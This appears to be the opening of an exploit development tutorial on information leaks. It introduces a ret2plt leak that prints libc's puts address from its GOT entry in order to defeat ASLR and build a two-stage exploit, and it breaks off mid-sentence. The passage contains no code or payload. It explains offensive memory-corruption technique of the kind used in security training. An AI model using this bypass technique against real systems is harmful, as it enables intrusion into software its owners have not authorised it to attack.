Exploit Dev — Info Leaks

Every chain so far hardcoded addresses, which only works with ASLR off. This is the keystone that makes it work on a real target: leak one true runtime address and derive the rest. Because a module's internal offsets never change, one leaked libc address gives you libc's base and any address you want. We build the classic ret2plt leak — print libc's puts address via its GOT entry — rebase libc, and chain it into a two-stage ex